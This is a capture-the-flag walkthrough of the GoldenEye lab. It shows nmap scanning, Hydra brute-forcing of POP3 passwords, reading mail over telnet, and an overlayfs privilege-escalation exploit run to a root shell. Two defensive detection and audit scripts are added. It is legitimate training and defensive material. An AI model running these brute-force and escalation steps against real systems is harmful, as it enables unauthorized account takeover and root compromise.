```
$ nmap -sC -sV -p- 10.10.251.158 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-26 13:25 IST
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: TLS randomness does not represent time
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/unknown
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
55007/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP UIDL AUTH-RESP-CODE USER PIPELINING STLS RESP-CODES SASL(PLAIN) CAPA
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 591.22 seconds
```
Take a look at the website, dive into the source code too, and remember to inspect all scripts!
Who needs to make sure they update their default password?
Answer: Boris
Steps to Reproduce: In terminal.js:
```
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//
```
What's their password?
Answer: InvincibleHack3r
Steps to Reproduce:
- In CyberChef, apply the From HTML Entity recipe to the encoded string from terminal.js; it decodes to InvincibleHack3r.
Now go use those credentials and login to a part of the site.
It's Mail Time
Take a look at some of the other services you found using your nmap scan. Are the credentials you have re-usable?
If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra? What's their new password?
Brute force the password of Boris:
```
$ hydra -l Boris -P /usr/share/wordlists/rockyou.txt -s 55007 -f 10.10.251.158 pop3 -V
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-26 13:54:07
[..snip..]
[55007][pop3] host: 10.10.251.158   login: Boris   password: REDACTED
[STATUS] attack finished for 10.10.251.158 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
```
Brute force the password of Natalya:
```
$ hydra -l Natalya -P /usr/share/wordlists/fasttrack.txt -s 55007 -f 10.10.251.158 pop3 -V
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-26 14:15:59
[..snip..]
[55007][pop3] host: 10.10.251.158   login: Natalya   password: REDACTED
[STATUS] attack finished for 10.10.251.158 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
```
Inspect port 55007. What service is configured to use this port?
Answer: telnet
Steps to Reproduce: We can connect to this port using telnet.
What can you find on this service?
Answer: emails
Steps to Reproduce:
Using Natalya's credentials:
```
$ telnet 10.10.251.158 55007
Trying 10.10.251.158...
Connected to 10.10.251.158.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER Natalya
+OK
PASS REDACTED
+OK Logged in.
-ERR Unknown command:
STAT
+OK 2 1679
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: REDACTED

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
.
```
Using Boris' credentials:
```
$ telnet 10.10.251.158 55007
Trying 10.10.251.158...
Connected to 10.10.251.158.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER Boris
+OK
PASS REDACTED
+OK Logged in.
LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id 4B9F4454B1
        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.
.
```
What user can break Boris' codes?
Answer: Natalya
Using the users you found on this service, find other users' passwords.
username: xenia
password: REDACTED
Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.
Too long and boring!!
GoldenEye Operators Training
Try using the credentials you found earlier. Which user can you login as?
Answer: xenia
Have a poke around the site. What other user can you find?
Answer: Doak
What was this user's password?
Using Hydra over pop3:
```
$ hydra -l Doak -P /usr/share/wordlists/fasttrack.txt -s 55007 -f 10.10.251.158 pop3 -V
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-26 14:42:49
[..snip..]
[55007][pop3] host: 10.10.251.158   login: Doak   password: REDACTED
[STATUS] attack finished for 10.10.251.158 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-26 14:45:51
```
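On the defender's side, the Hydra runs above (here and against Boris and Natalya earlier) leave a very recognisable trace in Dovecot's pop3-login syslog lines. The following is an added example of mine, not code from the room or this write-up: it reads such lines, finds bursts of authentication failures per source address, and reports any successful login from the same source after the burst. The log lines are constructed to imitate Dovecot's format; 10.10.14.5 and 10.10.14.9 are assumed client addresses.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches Dovecot pop3-login syslog lines for both a failed and a successful login.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed)[^<]*<(?P<user>[^>]*)>.*?\brip=(?P<rip>[\d.]+)"
)

def sample_lines():
    """Constructed sample log (not from the target): a 24-attempt burst against Boris
    from one assumed source, the login that follows it, and an unrelated normal login."""
    fail = ("Jun 26 13:54:{:02d} ubuntu dovecot: pop3-login: Disconnected (auth failed, "
            "1 attempts in 2 secs): user=<Boris>, method=PLAIN, rip=10.10.14.5, lip=10.10.251.158")
    login = ("Jun 26 {} ubuntu dovecot: pop3-login: Login: user=<{}>, method=PLAIN, "
             "rip={}, lip=10.10.251.158, mpid=2201")
    lines = [fail.format(s) for s in range(24)]
    lines.append(login.format("13:54:30", "Boris", "10.10.14.5"))
    lines.append(login.format("14:01:00", "natalya", "10.10.14.9"))
    return lines

def detect_bruteforce(lines, threshold=10, window_secs=60):
    """Per source IP: peak number of auth failures inside any window_secs window,
    the users tried, and successful logins from that IP at or after the last failure."""
    events = defaultdict(list)  # rip -> [(time, event, user)]
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            t = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less syslog stamp
            events[m["rip"]].append((t, m["event"], m["user"]))
    findings = {}
    for rip, evs in events.items():
        evs.sort()
        fails = [e for e in evs if e[1] != "Login"]
        peak = lo = 0
        for hi in range(len(fails)):  # sliding window over failure timestamps
            while (fails[hi][0] - fails[lo][0]).total_seconds() > window_secs:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak < threshold:
            continue
        last_fail = fails[-1][0]
        findings[rip] = {
            "peak_failures": peak,
            "users_tried": sorted({u for _, _, u in fails}),
            "logins_after_burst": sorted({u for t, ev, u in evs if ev == "Login" and t >= last_fail}),
        }
    return findings

if __name__ == "__main__":
    print(detect_bruteforce(sample_lines()))
```

A login reported under logins_after_burst is the account to treat as compromised and reset, which is exactly what happened to Boris, Natalya and Doak in this room.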
Use this user's credentials to go through all the services you have found to reveal more emails.
Doak's mailbox contains dr_doak's username and password:
```
$ telnet 10.10.251.158 55007
Trying 10.10.251.158...
Connected to 10.10.251.158.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER Doak
+OK
PASS REDACTED
+OK Logged in.
-ERR Unknown command:
LIST
+OK 1 messages:
1 606
.
RETR 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: REDACTED
.
```
What is the next user you can find from doak?
Answer: dr_doak
What is this user's password?
username: dr_doak
password: REDACTED
Take a look at their files on the Moodle site (severnaya-station.com).
There is a file named s3cret.txt for James.
Download the attachments and see if there are any hidden messages inside them?
This machine is vulnerable to the overlayfs exploit. The exploitation is technically very simple:
- Create a new user and mount namespace using clone with the CLONE_NEWUSER|CLONE_NEWNS flags.
- Mount an overlayfs using /bin as the lower filesystem and some temporary directories as the upper and work directories.
- The overlayfs mount is only visible within the user namespace, so let the namespace process change its CWD to the overlayfs, which makes the overlayfs visible outside the namespace too via the proc filesystem.
- Make su on the overlayfs world writable without changing the owner.
- Let a process outside the user namespace write arbitrary content to the file, applying a slightly modified variant of the SetgidDirectoryPrivilegeEscalation exploit.
Fix the exploit to work with the system you're trying to exploit. Remember, enumeration is your key! What development tools are installed on the machine?
By checking inside /usr/bin, we can find clang is installed. So, we can use that to compile the code!
Make sure to modify the line inside the exploit that contains gcc so that it uses clang instead:
```
lib = system("clang -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
```
Transfer the exploit to the victim machine and compile it!
cc was also installed on the machine!! That was the hint - one letter change!
```
www-data@ubuntu:/dev/shm$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# cd /root
# ls -la
total 44
drwx------  3 root root 4096 Apr 29  2018 .
drwxr-xr-x 22 root root 4096 Apr 24  2018 ..
-rw-r--r--  1 root root   19 May  3  2018 .bash_history
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc
drwx------  2 root root 4096 Apr 28  2018 .cache
-rw-------  1 root root  144 Apr 29  2018 .flag.txt
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-------  1 root root 1024 Apr 23  2018 .rnd
-rw-------  1 root root 8296 Apr 29  2018 .viminfo
# cat .flag.txt
Alec told me to place the codes here:

REDACTED

If you captured this make sure to go here.....
/006-final/xvf7-flag/
```
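For the host-hardening side of the overlayfs escalation described above, the following Python audit is an added example of mine, not code from the room or from the exploit. It checks the precondition of the first exploit step (unprivileged user namespaces being allowed), the artifact the exploit output shows (/etc/ld.so.preload being populated, here with /tmp/ofs-lib.so), and, as a general hygiene check, setuid/setgid files that are group- or world-writable. The sysctl names and directory paths are assumptions about the host being audited; the values in the test are constructed.

```python
import os
import stat

def ld_preload_entries(content):
    """Every non-comment line of /etc/ld.so.preload is a library injected into each
    dynamically linked process. A normal host has no file or an empty one, so any
    entry returned here is a finding."""
    return [l.strip() for l in content.splitlines()
            if l.strip() and not l.lstrip().startswith("#")]

def unprivileged_userns_allowed(sysctl):
    """sysctl: dict of /proc/sys values read from the host. A 0 in
    kernel.unprivileged_userns_clone (distribution kernels that carry that knob) or in
    user.max_user_namespaces (mainline kernels) blocks clone(CLONE_NEWUSER) for
    unprivileged users; if neither knob is present the namespace is assumed allowed."""
    present = [sysctl[k].strip() for k in
               ("kernel/unprivileged_userns_clone", "user/max_user_namespaces") if k in sysctl]
    return all(v != "0" for v in present)

def writable_setuid(entries):
    """entries: (path, st_mode) pairs as from os.lstat. Returns setuid/setgid files
    that are group- or world-writable, which should never exist on a sound host."""
    return [p for p, mode in entries
            if mode & (stat.S_ISUID | stat.S_ISGID) and mode & (stat.S_IWGRP | stat.S_IWOTH)]

def read_file(path):
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return None

def scan_modes(root):
    """(path, st_mode) for every entry directly under root; missing dirs give []."""
    out = []
    for name in (os.listdir(root) if os.path.isdir(root) else []):
        try:
            out.append((os.path.join(root, name), os.lstat(os.path.join(root, name)).st_mode))
        except OSError:
            pass
    return out

if __name__ == "__main__":
    sysctl = {k: v for k in ("kernel/unprivileged_userns_clone", "user/max_user_namespaces")
              if (v := read_file("/proc/sys/" + k)) is not None}
    print("ld.so.preload entries:", ld_preload_entries(read_file("/etc/ld.so.preload") or ""))
    print("unprivileged user namespaces allowed:", unprivileged_userns_allowed(sysctl))
    print("writable setuid/setgid files:", writable_setuid(scan_modes("/bin") + scan_modes("/usr/bin")))
```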